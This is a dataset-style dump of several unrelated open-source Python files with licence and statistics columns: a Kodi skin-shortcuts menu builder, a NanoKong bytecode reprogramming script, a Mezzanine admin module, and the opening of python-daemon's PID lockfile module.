if xbmc.getCondVisibility( hash[ 1 ][ 0 ] ):
if hash[ 1 ][ 2 ] == "True":
xbmc.executebuiltin( "Skin.SetBool(%s)" %( hash[ 1 ][ 1 ] ) )
else:
xbmc.executebuiltin( "Skin.Reset(%s)" %( hash[ 1 ][ 1 ] ) )
elif hash[0] == "::FULLMENU::":
# Mark that we need to set the fullmenu bool
foundFullMenu = True
elif hash[0] == "::SKINDIR::":
# Used to import menus from one skin to another, nothing to check here
pass
else:
try:
hasher = hashlib.md5()
hasher.update( xbmcvfs.File( hash[0] ).read() )
if hasher.hexdigest() != hash[1]:
log( "Hash does not match on file " + hash[0] )
log( "(" + hash[1] + " > " + hasher.hexdigest() + ")" )
return True
except:
log( "Unable to generate hash for %s" %( hash[ 0 ] ) )
log( "(%s > ?)" %( hash[ 1 ] ) )
else:
if xbmcvfs.exists( hash[0] ):
log( "File now exists " + hash[0] )
return True
# Set or clear the FullMenu skin bool
if foundFullMenu:
xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
else:
xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
# If the skin or script version, or profile list, haven't been checked, we need to rebuild the menu
# (most likely we're running an old version of the script)
if checkedXBMCVer == False or checkedSkinVer == False or checkedScriptVer == False or checkedProfileList == False or checkedPVRVis == False or checkedSharedMenu == False:
return True
# If we get here, the menu does not need to be rebuilt.
return False
def writexml( self, profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems ):
# Reset the hashlist, add the profile list and script version
hashlist.list = []
hashlist.list.append( ["::PROFILELIST::", profilelist] )
hashlist.list.append( ["::SCRIPTVER::", __addonversion__] )
hashlist.list.append( ["::XBMCVER::", __xbmcversion__] )
hashlist.list.append( ["::HIDEPVR::", __addon__.getSetting( "donthidepvr" )] )
hashlist.list.append( ["::SHARED::", __addon__.getSetting( "shared_menu" )] )
hashlist.list.append( ["::SKINDIR::", xbmc.getSkinDir()] )
# Clear any skin settings for backgrounds and widgets
DATA._reset_backgroundandwidgets()
self.widgetCount = 1
# Create a new tree and includes for the various groups
tree = xmltree.ElementTree( xmltree.Element( "includes" ) )
root = tree.getroot()
# Create a Template object and pass it the root
Template = template.Template()
Template.includes = root
Template.progress = progress
# Get any shortcuts we're checking for
self.checkForShortcuts = []
overridestree = DATA._get_overrides_skin()
checkForShorctcutsOverrides = overridestree.getroot().findall( "checkforshortcut" )
for checkForShortcutOverride in checkForShorctcutsOverrides:
if "property" in checkForShortcutOverride.attrib:
# Add this to the list of shortcuts we'll check for
self.checkForShortcuts.append( ( checkForShortcutOverride.text.lower(), checkForShortcutOverride.attrib.get( "property" ), "False" ) )
mainmenuTree = xmltree.SubElement( root, "include" )
mainmenuTree.set( "name", "skinshortcuts-mainmenu" )
submenuTrees = []
for level in range( 0, int( numLevels) + 1 ):
subelement = xmltree.SubElement(root, "include")
subtree = xmltree.SubElement( root, "include" )
if level == 0:
subtree.set( "name", "skinshortcuts-submenu" )
else:
subtree.set( "name", "skinshortcuts-submenu-" + str( level ) )
if not subtree in submenuTrees:
submenuTrees.append( subtree )
if buildMode == "single":
allmenuTree = xmltree.SubElement( root, "include" )
allmenuTree.set( "name", "skinshortcuts-allmenus" )
profilePercent = 100 / len( profilelist )
profileCount = -1
submenuNodes = {}
for profile in profilelist:
log( "Building menu for profile %s" %( profile[ 2 ] ) )
# Load profile details
profileDir = profile[0]
profileVis = profile[1]
profileCount += 1
# Reset whether we have settings
self.hasSettings = False
# Reset any checkForShortcuts to say we haven't found them
newCheckForShortcuts = []
for checkforShortcut in self.checkForShortcuts:
newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "False" ) )
self.checkForShortcuts = newCheckForShortcuts
# Clear any previous labelID's
DATA._clear_labelID()
# Clear any additional properties, which may be for a different profile
DATA.currentProperties = None
# Create objects to hold the items
menuitems = []
templateMainMenuItems = xmltree.Element( "includes" )
# If building the main menu, split the mainmenu shortcut nodes into the menuitems list
fullMenu = False
if groups == "" or groups.split( "|" )[0] == "mainmenu":
# Set a skinstring that marks that we're providing the whole menu
xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
hashlist.list.append( ["::FULLMENU::", "True"] )
for node in DATA._get_shortcuts( "mainmenu", None, True, profile[0] ).findall( "shortcut" ):
menuitems.append( node )
fullMenu = True
else:
# Clear any skinstring marking that we're providing the whole menu
xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
hashlist.list.append( ["::FULLMENU::", "False"] )
# If building specific groups, split them into the menuitems list
count = 0
if groups != "":
for group in groups.split( "|" ):
if count != 0 or group != "mainmenu":
menuitems.append( group )
if len( menuitems ) == 0:
# No groups to build
break
itemidmainmenu = 0
if len( Template.otherTemplates ) == 0:
percent = profilePercent / len( menuitems )
else:
percent = float( profilePercent ) / float( len( menuitems ) * 2 )
Template.percent = percent * ( len( menuitems ) )
i = 0
for item in menuitems:
i += 1
itemidmainmenu += 1
currentProgress = ( profilePercent * profileCount ) + ( percent * i )
progress.update( int( currentProgress ) )
Template.current = currentProgress
submenuDefaultID = None
if not isinstance( item, basestring ):
# This is a main menu item (we know this because it's an element, not a string)
submenu = item.find( "labelID" ).text
# Build the menu item
menuitem, allProps = self.buildElement( item, "mainmenu", None, profile[1], DATA.slugify( submenu, convertInteger=True ), itemid = itemidmainmenu, options = options )
# Save a copy for the template
templateMainMenuItems.append( Template.copy_tree( menuitem ) )
# Get submenu defaultID
submenuDefaultID = item.find( "defaultID" ).text
# Remove any template-only properties
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
for key in otherProperties:
if key in allProps.keys() and key in templateOnly:
# This key is template-only
menuitem.remove( allProps[ key ] )
allProps.pop( key )
# Add the menu item to the various includes, retaining a reference to them
mainmenuItemA = Template.copy_tree( menuitem )
mainmenuTree.append( mainmenuItemA )
if buildMode == "single":
mainmenuItemB = Template.copy_tree( menuitem )
allmenuTree.append( mainmenuItemB )
else:
# It's an additional menu, so get its labelID
submenu = DATA._get_labelID( item, None )
# Build the submenu
count = 0 # Used to keep track of additional submenu
for submenuTree in submenuTrees:
submenuVisibilityName = submenu
if count == 1:
submenu = submenu + "." + str( count )
elif count != 0:
submenu = submenu[:-1] + str( count )
submenuVisibilityName = submenu[:-2]
# Get the tree's we're going to write the menu to
if submenu in submenuNodes:
justmenuTreeA = submenuNodes[ submenu ][ 0 ]
justmenuTreeB = submenuNodes[ submenu ][ 1 ]
else:
# Create these nodes
justmenuTreeA = xmltree.SubElement( root, "include" )
justmenuTreeB = xmltree.SubElement( root, "include" )
justmenuTreeA.set( "name", "skinshortcuts-group-" + DATA.slugify( submenu ) )
justmenuTreeB.set( "name", "skinshortcuts-group-alt-" + DATA.slugify( submenu ) )
submenuNodes[ submenu ] = [ justmenuTreeA, justmenuTreeB ]
itemidsubmenu = 0
# Get the shortcuts for the submenu
if count == 0:
submenudata = DATA._get_shortcuts( submenu, submenuDefaultID, True, profile[0] )
else:
submenudata = DATA._get_shortcuts( submenu, None, True, profile[0] )
if type( submenudata ) == list:
submenuitems = submenudata
else:
submenuitems = submenudata.findall( "shortcut" )
# Are there any submenu items for the main menu?
if count == 0:
if len( submenuitems ) != 0:
try:
hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "True"
if buildMode == "single":
hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "True"
except:
# There probably isn't a main menu
pass
else:
try:
hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "False"
if buildMode == "single":
hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "False"
except:
# There probably isn't a main menu
pass
# If we're building a single menu, update the onclicks of the main menu
if buildMode == "single" and not len( submenuitems ) == 0:
for onclickelement in mainmenuItemB.findall( "onclick" ):
if "condition" in onclickelement.attrib:
onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ") + [" + onclickelement.attrib.get( "condition" ) + "]" )
newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
newonclick.set( "condition", onclickelement.attrib.get( "condition" ) )
else:
onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
# Build the submenu items
templateSubMenuItems = xmltree.Element( "includes" )
for submenuItem in submenuitems:
itemidsubmenu += 1
# Build the item without any visibility conditions
menuitem, allProps = self.buildElement( submenuItem, submenu, None, profile[1], itemid = itemidsubmenu, options = options )
isSubMenuElement = xmltree.SubElement( menuitem, "property" )
isSubMenuElement.set( "name", "isSubmenu" )
isSubMenuElement.text = "True"
# Save a copy for the template
templateSubMenuItems.append( Template.copy_tree( menuitem ) )
# Remove any template-only properties
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
for key in otherProperties:
if key in allProps.keys() and key in templateOnly:
# This key is template-only
menuitem.remove( allProps[ key ] )
allProps.pop( key )
# Add it, with appropriate visibility conditions, to the various submenu includes
justmenuTreeA.append( menuitem )
menuitemCopy = Template.copy_tree( menuitem )
visibilityElement = menuitemCopy.find( "visible" )
visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
justmenuTreeB.append( menuitemCopy )
if buildMode == "single":
# Add the property 'submenuVisibility'
allmenuTreeCopy = Template.copy_tree( menuitemCopy )
submenuVisibility = xmltree.SubElement( allmenuTreeCopy, "property" )
submenuVisibility.set( "name", "submenuVisibility" )
submenuVisibility.text = DATA.slugify( submenuVisibilityName, convertInteger=True )
allmenuTree.append( allmenuTreeCopy )
menuitemCopy = Template.copy_tree( menuitem )
visibilityElement = menuitemCopy.find( "visible" )
visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
submenuTree.append( menuitemCopy )
# Build the template for the submenu
Template.parseItems( "submenu", count, templateSubMenuItems, profile[ 2 ], profile[ 1 ], "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")", item )
count += 1
if self.hasSettings == False:
# Check if the overrides asks for a forced settings...
overridestree = DATA._get_overrides_skin()
forceSettings = overridestree.getroot().find( "forcesettings" )
if forceSettings is not None:
# We want a settings option to be added
newelement = xmltree.SubElement( mainmenuTree, "item" )
xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
xmltree.SubElement( newelement, "visible" ).text = profile[1]
if buildMode == "single":
newelement = xmltree.SubElement( mainmenuTree, "item" )
xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
xmltree.SubElement( newelement, "visible" ).text = profile[1]
if len( self.checkForShortcuts ) != 0:
# Add a value to the variable for all checkForShortcuts
for checkForShortcut in self.checkForShortcuts:
if profile[ 1 ] is not None and xbmc.getCondVisibility( profile[ 1 ] ):
# Current profile - set the skin bool
if checkForShortcut[ 2 ] == "True":
xbmc.executebuiltin( "Skin.SetBool(%s)" %( checkForShortcut[ 1 ] ) )
else:
xbmc.executebuiltin( "Skin.Reset(%s)" %( checkForShortcut[ 1 ] ) )
# Save this to the hashes file, so we can set it on profile changes
hashlist.list.append( [ "::SKINBOOL::", [ profile[ 1 ], checkForShortcut[ 1 ], checkForShortcut[ 2 ] ] ] )
# Build the template for the main menu
Template.parseItems( "mainmenu", 0, templateMainMenuItems, profile[ 2 ], profile[ 1 ], "", "", mainmenuID )
# If we haven't built enough main menu items, copy the ones we have
while itemidmainmenu < minitems and fullMenu and len( mainmenuTree ) != 0:
updatedMenuTree = Template.copy_tree( mainmenuTree )
for item in updatedMenuTree:
itemidmainmenu += 1
# Update ID
item.set( "id", str( itemidmainmenu ) )
for idElement in item.findall( "property" ):
if idElement.attrib.get( "name" ) == "id":
idElement.text = "$NUM[%s]" %( str( itemidmainmenu ) )
mainmenuTree.append( item )
# Build any 'Other' templates
Template.writeOthers()
progress.update( 100, message = __language__( 32098 ) )
# Get the skins addon.xml file
addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
addon = xmltree.parse( addonpath )
extensionpoints = addon.findall( "extension" )
paths = []
for extensionpoint in extensionpoints:
if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
resolutions = extensionpoint.findall( "res" )
for resolution in resolutions:
path = xbmc.translatePath( os.path.join( try_decode( self.skinDir ) , try_decode( resolution.attrib.get( "folder" ) ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode('utf-8')
paths.append( path )
skinVersion = addon.getroot().attrib.get( "version" )
# Save the tree
DATA.indent( tree.getroot() )
for path in paths:
tree.write( path, encoding="UTF-8" )
# Save the hash of the file we've just written
with open(path, "r+") as f:
DATA._save_hash( path, f.read() )
f.close()
# Save the hashes
# Append the skin version to the hashlist
hashlist.list.append( ["::SKINVER::", skinVersion] )
# Save the hashes
file = xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ), "w" )
file.write( repr( hashlist.list ) )
file.close()
def buildElement( self, item, groupName, visibilityCondition, profileVisibility, submenuVisibility = None, itemid=-1, options=[] ):
# This function will build an element for the passed Item in
newelement = xmltree.Element( "item" )
allProps = {}
# Set ID
if itemid is not -1:
newelement.set( "id", str( itemid ) )
idproperty = xmltree.SubElement( newelement, "property" )
idproperty.set( "name", "id" )
idproperty.text = "$NUM[%s]" %( str( itemid ) )
allProps[ "id" ] = idproperty
# Label and label2
xmltree.SubElement( newelement, "label" ).text = DATA.local( item.find( "label" ).text )[1]
xmltree.SubElement( newelement, "label2" ).text = DATA.local( item.find( "label2" ).text )[1]
# Icon and thumb
icon = item.find( "override-icon" )
if icon is None:
icon = item.find( "icon" )
if icon is None:
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
else:
xmltree.SubElement( newelement, "icon" ).text = try_decode( icon.text )
thumb = item.find( "thumb" )
if thumb is not None:
xmltree.SubElement( newelement, "thumb" ).text = try_decode( item.find( "thumb" ).text )
# labelID and defaultID
labelID = xmltree.SubElement( newelement, "property" )
labelID.text = item.find( "labelID" ).text
labelID.set( "name", "labelID" )
allProps[ "labelID" ] = labelID
defaultID = xmltree.SubElement( newelement, "property" )
defaultID.text = item.find( "defaultID" ).text
defaultID.set( "name", "defaultID" )
allProps[ "defaultID" ] = defaultID
# Clear cloned options if main menu
if groupName == "mainmenu":
self.MAINWIDGET = {}
self.MAINBACKGROUND = {}
self.MAINPROPERTIES = {}
# Get fallback custom properties
foundProperties = []
# Additional properties
properties = eval( item.find( "additional-properties" ).text )
if len( properties ) != 0:
for property in properties:
if property[0] == "node.visible":
visibleProperty = xmltree.SubElement( newelement, "visible" )
visibleProperty.text = try_decode( property[1] )
else:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", property[0].decode( "utf-8" ) )
additionalproperty.text = property[1]
allProps[ property[ 0 ] ] = additionalproperty
# If this is a widget or background, set a skin setting to say it's enabled
if property[0] == "widget":
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-widget-" + property[1] + ")" )
# And if it's the main menu, list it
if groupName == "mainmenu":
xbmc.executebuiltin( "Skin.SetString(skinshortcuts-widget-" + str( self.widgetCount ) + "," + property[ 1 ] + ")" )
self.widgetCount += 1
elif property[0] == "background":
try:
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1] + ")" )
except UnicodeEncodeError:
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1].encode('utf-8') + ")" )
# If this is the main menu, and we're cloning widgets, backgrounds or properties...
if groupName == "mainmenu":
if "clonewidgets" in options:
widgetProperties = [ "widget", "widgetName", "widgetType", "widgetTarget", "widgetPath", "widgetPlaylist" ]
if property[0] in widgetProperties:
self.MAINWIDGET[ property[0] ] = property[1]
if "clonebackgrounds" in options:
backgroundProperties = [ "background", "backgroundName", "backgroundPlaylist", "backgroundPlaylistName" ]
if property[0] in backgroundProperties:
self.MAINBACKGROUND[ property[0] ] = property[1]
if "cloneproperties" in options:
self.MAINPROPERTIES[ property[0] ] = property[1]
# For backwards compatibility, save widgetPlaylist as widgetPath too
if property[ 0 ] == "widgetPlaylist":
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", "widgetPath" )
additionalproperty.text = try_decode( property[1] )
# Get fallback properties, property requirements, templateOnly value of properties
fallbackProperties, fallbacks = DATA._getCustomPropertyFallbacks( groupName )
# Add fallback properties
for key in fallbackProperties:
if key not in allProps.keys():
# Check whether we have a fallback for the value
for propertyMatch in fallbacks[ key ]:
matches = False
if propertyMatch[ 1 ] is None:
# This has no conditions, so it matched
matches = True
else:
# This has an attribute and a value to match against
for property in properties:
if property[ 0 ] == propertyMatch[ 1 ] and property[ 1 ] == propertyMatch[ 2 ]:
matches = True
break
if matches:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key.decode( "utf-8" ) )
additionalproperty.text = propertyMatch[ 0 ]
allProps[ key ] = additionalproperty
break
# Get property requirements
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
# Remove any properties whose requirements haven't been met
for key in otherProperties:
if key in allProps.keys() and key in requires.keys() and requires[ key ] not in allProps.keys():
# This properties requirements aren't met
newelement.remove( allProps[ key ] )
allProps.pop( key )
# Primary visibility
visibility = item.find( "visibility" )
if visibility is not None:
xmltree.SubElement( newelement, "visible" ).text = visibility.text
#additional onclick (group overrides)
onclicks = item.findall( "additional-action" )
for onclick in onclicks:
onclickelement = xmltree.SubElement( newelement, "onclick" )
onclickelement.text = onclick.text
if "condition" in onclick.attrib:
onclickelement.set( "condition", onclick.attrib.get( "condition" ) )
# Onclick
onclicks = item.findall( "override-action" )
if len( onclicks ) == 0:
onclicks = item.findall( "action" )
for onclick in onclicks:
onclickelement = xmltree.SubElement( newelement, "onclick" )
# Updrage action if necessary
onclick.text = DATA.upgradeAction( onclick.text )
# PVR Action
if onclick.text.startswith( "pvr-channel://" ):
# PVR action
onclickelement.text = "RunScript(script.skinshortcuts,type=launchpvr&channel=" + onclick.text.replace( "pvr-channel://", "" ) + ")"
elif onclick.text.startswith( "ActivateWindow(" ) and xbmc.translatePath( "special://skin/" ) in onclick.text:
# Skin-relative links
try:
actionParts = onclick.text[15:-1].split( "," )
actionParts[1] = actionParts[1].replace( xbmc.translatePath( "special://skin/" ), "" )
path = actionParts[1].split( os.sep )
newAction = "special://skin"
for actionPart in actionParts[1].split( os.sep ):
if actionPart != "":
newAction = newAction + "/" + actionPart
if len( actionParts ) == 2:
onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + ")"
else:
onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + "," + actionParts[2] + ")"
except:
pass
else:
onclickelement.text = onclick.text
# Also add it as a path property
if not self.propertyExists( "path", newelement ) and not "path" in allProps.keys():
# we only add the path property if there isn't already one in the list because it has to be unique in Kodi lists
pathelement = xmltree.SubElement( newelement, "property" )
pathelement.set( "name", "path" )
pathelement.text = onclickelement.text
allProps[ "path" ] = pathelement
# Get 'list' property (the action property of an ActivateWindow shortcut)
if not self.propertyExists( "list", newelement ) and not "list" in allProps.keys():
# we only add the list property if there isn't already one in the list because it has to be unique in Kodi lists
listElement = xmltree.SubElement( newelement, "property" )
listElement.set( "name", "list" )
listElement.text = DATA.getListProperty( onclickelement.text.replace('"','') )
allProps[ "list" ] = listElement
if onclick.text == "ActivateWindow(Settings)":
self.hasSettings = True
if "condition" in onclick.attrib:
onclickelement.set( "condition", onclick.attrib.get( "condition" ) )
if len( self.checkForShortcuts ) != 0:
# Check if we've been asked to watch for this shortcut
newCheckForShortcuts = []
for checkforShortcut in self.checkForShortcuts:
if onclick.text.lower() == checkforShortcut[ 0 ]:
# They match, change the value to True
newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "True" ) )
else:
newCheckForShortcuts.append( checkforShortcut )
self.checkForShortcuts = newCheckForShortcuts
# Visibility
if visibilityCondition is not None:
visibilityElement = xmltree.SubElement( newelement, "visible" )
if profileVisibility is not None:
visibilityElement.text = profileVisibility + " + [" + visibilityCondition + "]"
else:
visibilityElement.text = visibilityCondition
issubmenuElement = xmltree.SubElement( newelement, "property" )
issubmenuElement.set( "name", "isSubmenu" )
issubmenuElement.text = "True"
allProps[ "isSubmenu" ] = issubmenuElement
elif profileVisibility is not None:
visibilityElement = xmltree.SubElement( newelement, "visible" )
visibilityElement.text = profileVisibility
# Submenu visibility
if submenuVisibility is not None:
submenuVisibilityElement = xmltree.SubElement( newelement, "property" )
submenuVisibilityElement.set( "name", "submenuVisibility" )
if submenuVisibility.isdigit():
submenuVisibilityElement.text = "$NUMBER[" + submenuVisibility + "]"
else:
submenuVisibilityElement.text = DATA.slugify( submenuVisibility )
# Group name
group = xmltree.SubElement( newelement, "property" )
group.set( "name", "group" )
group.text = try_decode( groupName )
allProps[ "group" ] = group
# If this isn't the main menu, and we're cloning widgets or backgrounds...
if groupName != "mainmenu":
if "clonewidgets" in options and len( self.MAINWIDGET ) is not 0:
for key in self.MAINWIDGET:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = try_decode( self.MAINWIDGET[ key ] )
allProps[ key ] = additionalproperty
if "clonebackgrounds" in options and len( self.MAINBACKGROUND ) is not 0:
for key in self.MAINBACKGROUND:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = DATA.local( self.MAINBACKGROUND[ key ] )[1]
allProps[ key ] = additionalproperty
if "cloneproperties" in options and len( self.MAINPROPERTIES ) is not 0:
for key in self.MAINPROPERTIES:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = DATA.local( self.MAINPROPERTIES[ key ] )[1]
allProps[ key ] = additionalproperty
propertyPatterns = self.getPropertyPatterns(labelID.text, groupName)
if len(propertyPatterns) > 0:
propertyReplacements = self.getPropertyReplacements(newelement)
for propertyName in propertyPatterns:
propertyPattern = propertyPatterns[propertyName][0]
for original, replacement in propertyReplacements:
regexpPattern = re.compile(re.escape(original), re.IGNORECASE)
propertyPattern = regexpPattern.sub(replacement, propertyPattern)
additionalproperty = xmltree.SubElement(newelement, "property")
additionalproperty.set("name", propertyName.decode("utf-8"))
additionalproperty.text = propertyPattern.decode("utf-8")
allProps[ propertyName ] = additionalproperty
return( newelement, allProps )
def getPropertyPatterns(self, labelID, group):
propertyPatterns = {}
if not self.loadedPropertyPatterns:
overrides = DATA._get_overrides_skin()
self.propertyPatterns = overrides.getroot().findall("propertypattern")
self.loadedPropertyPatterns = True
for propertyPatternElement in self.propertyPatterns:
propertyName = propertyPatternElement.get("property")
propertyGroup = propertyPatternElement.get("group")
if not propertyName or not propertyGroup or propertyGroup != group or not propertyPatternElement.text:
continue
propertyLabelID = propertyPatternElement.get("labelID")
if not propertyLabelID:
if propertyName not in propertyPatterns:
propertyPatterns[propertyName] = [propertyPatternElement.text, False]
elif propertyLabelID == labelID:
if propertyName not in propertyPatterns or propertyPatterns[propertyName][1] == False:
propertyPatterns[propertyName] = [propertyPatternElement.text, True]
return propertyPatterns
def getPropertyReplacements(self, element):
propertyReplacements = []
for subElement in list(element):
if subElement.tag == "property":
propertyName = subElement.get("name")
if propertyName and subElement.text:
propertyReplacements.append(("::%s::" % propertyName, subElement.text))
elif subElement.text:
propertyReplacements.append(("::%s::" % subElement.tag, subElement.text))
return propertyReplacements
def propertyExists( self, propertyName, element ):
for item in element.findall( "property" ):
if propertyName in item.attrib:
return True
return False
def findIncludePosition( self, list, item ):
try:
return list.index( item )
except:
return None
| gpl-2.0 | -6,610,807,520,888,053,000 | 50.962664 | 267 | 0.53011 | false | 4.710483 | false | false | false |
wukong-m2m/NanoKong | tools/inteldemo201202/reprogram.py | 1 | 3181 | #!/usr/bin/python
import sys
import pynvc
def reprogramNvmdefault(destination, filename):
MESSAGESIZE = 16
reply = pynvc.sendWithRetryAndCheckedReceive(destination=destination,
command=pynvc.REPRG_OPEN,
allowedReplies=[pynvc.REPRG_OPEN_R],
quitOnFailure=True)
pagesize = reply[1]*256 + reply[2]
lines = [" " + l.replace('0x','').replace(',','').replace('\n','') for l in open(filename).readlines() if l.startswith('0x')]
bytecode = []
for l in lines:
for b in l.split():
bytecode.append(int(b, 16))
print "Uploading", len(bytecode), "bytes."
packetLost = False
pos = 0
while not pos == len(bytecode):
payload_pos = [pos/256, pos%256]
payload_data = bytecode[pos:pos+MESSAGESIZE]
if pos/pagesize == (pos+len(payload_data))/pagesize:
if packetLost == False and pos == 32:
print "------------->Simulating packet loss"
# drop this one packet
packetLost = True
else:
pynvc.sendcmd(destination, pynvc.REPRG_WRITE, payload_pos+payload_data)
pos += len(payload_data)
else:
# Send last packet of this page and wait for a REPRG_WRITE_R_RETRANSMIT after each full page
reply = pynvc.sendWithRetryAndCheckedReceive(destination=destination,
command=pynvc.REPRG_WRITE,
allowedReplies=[pynvc.REPRG_WRITE_R_OK, pynvc.REPRG_WRITE_R_RETRANSMIT],
payload=payload_pos+payload_data,
quitOnFailure=True)
print "Page boundary reached, wait for REPRG_WRITE_R_OK or REPRG_WRITE_R_RETRANSMIT"
if reply[0] == pynvc.REPRG_WRITE_R_OK:
print "Received REPRG_WRITE_R_OK in reply to packet writing at", payload_pos
pos += len(payload_data)
else:
pos = reply[1]*256 + reply[2]
print "===========>Received REPRG_WRITE_R_RETRANSMIT request to retransmit from ", pos
# Send REPRG_COMMIT after last packet
if pos == len(bytecode):
reply = pynvc.sendWithRetryAndCheckedReceive(
destination=destination,
command=pynvc.REPRG_COMMIT,
allowedReplies=[pynvc.REPRG_COMMIT_R_RETRANSMIT,
pynvc.REPRG_COMMIT_R_FAILED,
pynvc.REPRG_COMMIT_R_OK],
payload=[pos/256, pos%256],
quitOnFailure=True)
if reply[0] == pynvc.REPRG_COMMIT_R_OK:
print reply
print "Commit OK."
elif reply[0] == pynvc.REPRG_COMMIT_R_RETRANSMIT:
pos = reply[1]*256 + reply[2]
print "===========>Received REPRG_COMMIT_R_RETRANSMIT request to retransmit from ", pos
else:
print "Commit failed."
quit()
pynvc.sendcmd(destination, pynvc.SETRUNLVL, [pynvc.RUNLVL_RESET])
if __name__ == "__main__":
pynvc.init()
reprogramNvmdefault(int(sys.argv[1]), sys.argv[2])
| gpl-2.0 | -2,236,280,340,222,188,800 | 41.986486 | 127 | 0.552028 | false | 3.716121 | false | false | false |
lillisgary/mezzanine-newsue | build/lib.linux-x86_64-2.7/sue/admin.py | 2 | 1414 | from django.contrib import admin
from mezzanine.pages.admin import PageAdmin
from .models import HomePage, Slide, Portfolio, PortfolioItem, PortfolioItemImage, PortfolioItemCategory, Porter, TempPortfolio, ItemPorter, Portfolios, DocumentListItem, DocumentList, DocumentListItemCategory
from mezzanine.core.admin import TabularDynamicInlineAdmin
class SlideInline(TabularDynamicInlineAdmin):
model = Slide
class PorterInline(TabularDynamicInlineAdmin):
model = Porter
class ItemPorterInline(TabularDynamicInlineAdmin):
model = ItemPorter
class HomePageAdmin(PageAdmin):
inlines = (SlideInline, PorterInline,)
class TempPortfolioAdmin(PageAdmin):
inlines = (ItemPorterInline,)
class PortfolioItemImageInline(TabularDynamicInlineAdmin):
model = PortfolioItemImage
class PortfolioItemAdmin(PageAdmin):
inlines = (PortfolioItemImageInline,)
class DocumentListItemInline(TabularDynamicInlineAdmin):
model = DocumentListItem
class DocumentListAdmin(PageAdmin):
inlines = (DocumentListItemInline,)
admin.site.register(HomePage, HomePageAdmin)
admin.site.register(TempPortfolio, TempPortfolioAdmin)
admin.site.register(Portfolio, PageAdmin)
admin.site.register(Portfolios, PageAdmin)
admin.site.register(PortfolioItemCategory)
admin.site.register(PortfolioItem, PortfolioItemAdmin)
admin.site.register(DocumentList, DocumentListAdmin)
admin.site.register(DocumentListItemCategory)
| bsd-2-clause | -4,301,660,201,645,536,000 | 33.487805 | 209 | 0.834512 | false | 3.740741 | false | false | false |
Peddle/hue | desktop/core/ext-py/python-daemon/daemon/pidlockfile.py | 42 | 5946 | # -*- coding: utf-8 -*-
# daemon/pidlockfile.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright © 2008–2009 Ben Finney <[email protected]>
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Lockfile behaviour implemented via Unix PID files.
"""
import os
import errno
from lockfile import (
LinkFileLock,
AlreadyLocked, LockFailed,
NotLocked, NotMyLock,
)
class PIDFileError(Exception):
""" Abstract base class for errors specific to PID files. """
class PIDFileParseError(ValueError, PIDFileError):
